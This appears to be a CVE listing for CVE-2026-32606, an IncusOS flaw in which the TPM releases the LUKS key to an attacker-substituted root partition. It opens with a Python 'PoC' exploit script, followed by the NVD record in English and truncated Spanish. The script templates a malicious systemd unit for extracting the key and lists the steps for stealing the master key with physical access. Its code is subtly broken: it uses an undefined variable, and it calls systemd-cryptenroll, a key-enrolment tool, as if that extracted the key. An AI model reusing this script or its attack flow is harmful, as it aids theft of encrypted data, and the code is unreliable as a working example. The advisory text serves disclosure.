CVE-2026-32606

# CVE-2026-32606 PoC - IncusOS TPM LUKS Bypass # This PoC demonstrates the conceptual attack flow # Note: Physical access to the target system is required import subprocess import os def check_tpm_state(): """Check TPM PCR state""" result = subprocess.run( ['tpm2_pcrread'], capture_output=True, text=True ) return result.stdout def enumerate_disks(): """List available block devices""" result = subprocess.run( ['lsblk', '-o', 'NAME,SIZE,TYPE,MOUNTPOINT'], capture_output=True, text=True ) return result.stdout def check_luks_container(device): """Check if device is a LUKS container""" result = subprocess.run( ['cryptsetup', 'isLuks', device], capture_output=True, text=True ) return result.returncode == 0 def get_root_partition_uuid(): """Get current root partition UUID from GPT""" result = subprocess.run( ['blkid', '-s', 'PARTUUID', '-o', 'value', '/dev/root'], capture_output=True, text=True ) return result.stdout.strip() def create_malicious_partition(): """ Create attacker-controlled partition with: - Same GPT partition UUID as original root - Attacker-defined recovery key - Malicious systemd unit for key extraction """ malicious_unit = ''' [Unit] Description=TPM Key Extraction Service [email protected] Before=basic.target [Service] Type=oneshot ExecStart=/usr/local/bin/extract_luks_key RemainAfterExit=yes [Install] WantedBy=basic.target ''' return malicious_unit def extract_luks_key(): """ Extract LUKS volume key using TPM This works because PCR11 policy allows key release from attacker-controlled partition """ # Read LUKS header with TPM unsealed key cmd = [ 'systemd-cryptenroll', '--tpm2-device=auto', '--tpm2-pcrs=7+11', device_path ] return subprocess.run(cmd, capture_output=True) # Attack flow: # 1. Physical access to powered-off system # 2. Replace original encrypted root with attacker partition # 3. Boot system with substituted partition # 4. Enter attacker-defined recovery key # 5. Malicious systemd unit executes # 6. TPM releases real LUKS key due to PCR11 policy # 7. Extract master key and access original encrypted data if __name__ == '__main__': print('[+] CVE-2026-32606 PoC - TPM LUKS Bypass Attack') print('[+] This demonstrates the attack methodology') print('[!] Physical access required to target system')

{"cve": {"id": "CVE-2026-32606", "sourceIdentifier": "[email protected]", "published": "2026-03-18T06:16:18.970", "lastModified": "2026-04-28T21:13:28.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IncusOS is an immutable OS image dedicated to running Incus. Prior to 202603142010, the default configuration of systemd-cryptenroll as used by IncusOS through mkosi allows for an attacker with physical access to the machine to access the encrypted data without requiring any interaction by the system's owner or any tampering of Secure Boot state or kernel (UKI) boot image. That's because in this configuration, the LUKS key is made available by the TPM so long as the system has the expected PCR7 value and the PCR11 policy matches. That default PCR11 policy importantly allows for the TPM to release the key to the booted system rather than just from the initrd part of the signed kernel image (UKI). The attack relies on the attacker being able to substitute the original encrypted root partition for one that they control. By doing so, the system will prompt for a recovery key on boot, which the attacker has defined and can provide, before booting the system using the attacker's root partition rather than the system's original one. The attacker only needs to put a systemd unit starting on system boot within their root partition to have the system run that logic on boot. That unit will then run in an environment where the TPM will allow for the retrieval of the encryption key of the real root disk, allowing the attacker to steal the LUKS volume key (immutable master key) and then use it against the real root disk, altering it or getting data out before putting the disk back the way it was and returning the system without a trace of this attack having happened. This is all possible because the system will have still booted with Secure Boot enabled, will have measured and ran the expected bootloader and kernel image (UKI). The initrd selects the root disk based on GPT partition identifiers making it possible to easily substitute the real root disk for an attacker controlled one. This doesn't lead to any change in the TPM state and therefore allows for retrieval of the LUKS key by the attacker through a boot time systemd unit on their alternative root partition. IncusOS version 202603142010 (2026/03/14 20:10 UTC) includes the new PCR15 logic and will automatically update the TPM policy on boot. Anyone suspecting that their system may have been physically accessed while shut down should perform a full system wipe and reinstallation as only that will rotate the LUKS volume key and prevent subsequent access to the encrypted data should the system have been previously compromised. There are no known workarounds other than updating to a version with corrected logic which will automatically rebind the LUKS keys to the new set of TPM registers and prevent this from being exploited."}, {"lang": "es", "value": "IncusOS es una imagen de SO inmutable dedicada a ejecutar Incus. Antes de 202603142010, la configuración predeterminada de systemd-cryptenroll utilizada por IncusOS a través de mkosi permite a un atacante con acceso físico a la máquina acceder a los datos cifrados sin requerir ninguna interacción por parte del propietario del sistema ni ninguna manipulación del estado de Secure Boot o de la imagen de arranque del kernel (UKI). Esto se debe a que, en esta configuración, la clave LUKS es puesta a disposición por el TPM siempre y cuando el sistema tenga el valor PCR7 esperado y la política PCR11 coincida. Esa política PCR11 predeterminada, de manera importante, permite al TPM liberar la clave al sistema arrancado en lugar de solo desde la parte initrd de la imagen del kernel firmada (UKI). El ataque se basa en que el atacante pueda sustituir la partición raíz cifrada original por una que ellos controlan. Al hacerlo, el sistema solicitará una clave de recuperación al arrancar, que el atacante ha definido y puede proporcionar, antes de arrancar el sistema utilizando la partición raíz del atacante en lugar de la original del sistema. El atacante solo necesita colocar una unidad systemd que se inicie con el arranque del sistema dentro de su partición raíz para que el sistema ejecute esa lógica al arrancar. Esa unidad se ejecutará entonces en un entorno donde el TPM permitirá la recuperación de la clave de cifrado del disco raíz real, permitiendo al atacante robar la clave de volumen LUKS (clave maestra inmutable) y luego usarla contra el disco raíz real, alterándolo o extrayendo datos antes de volver a colocar el disco como estaba y devolver el sistema sin dejar rastro de que este ataque haya ocurrido. Todo esto es posible porque el sistema habrá arrancado con Secure Boot habilitado, habrá medido y ejecutado el cargador de arranque y la imagen del kernel (UKI) esperados. El initrd selecciona el disco raíz basándose en identificadores de partición GPT, lo que hace posible susti ... (truncated)